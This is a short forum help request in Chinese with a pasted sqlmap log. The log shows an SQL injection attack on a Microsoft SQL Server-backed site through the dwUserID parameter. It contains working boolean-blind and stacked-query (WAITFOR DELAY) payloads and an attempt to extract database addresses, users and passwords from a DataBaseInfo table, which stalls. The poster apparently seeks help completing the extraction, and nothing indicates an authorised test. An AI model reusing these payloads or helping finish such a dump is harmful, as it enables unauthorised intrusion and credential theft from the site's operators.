22,298
社区成员




那位大神帮解答一下 谢谢!!!!
[02:15:31] [INFO] resuming back-end DBMS 'microsoft sql server'
[02:15:31] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: dwUserID (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: GetMark=12&dwUserID=2 AND 2353=2353
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: GetMark=12&dwUserID=2;WAITFOR DELAY '0:0:5'--
---
[02:15:31] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 8.1 or 2012 R2
web application technology: ASP.NET, Microsoft IIS 8.5, PHP 7.2.1
back-end DBMS: Microsoft SQL Server 2012
[02:15:31] [INFO] fetching entries of column(s) 'DBAddr, DBPassword, DBPort, DBUser' for table 'DataBaseInfo' in database 'RYPlatformDB'
[02:15:31] [INFO] fetching number of column(s) 'DBAddr, DBPassword, DBPort, DBUser' entries for table 'DataBaseInfo' in database 'RYPlatformDB'
[02:15:31] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[02:15:31] [INFO] retrieved:
[02:15:31] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)
[02:15:33] [WARNING] it is very important to not stress the network adapter during usage of time-based payloads to prevent potential disruptions
[02:15:33] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[02:15:33] [WARNING] unable to retrieve the number of column(s) 'DBAddr, DBPassword, DBPort, DBUser' entries for table 'DataBaseInfo' in database 'RYP
latformDB'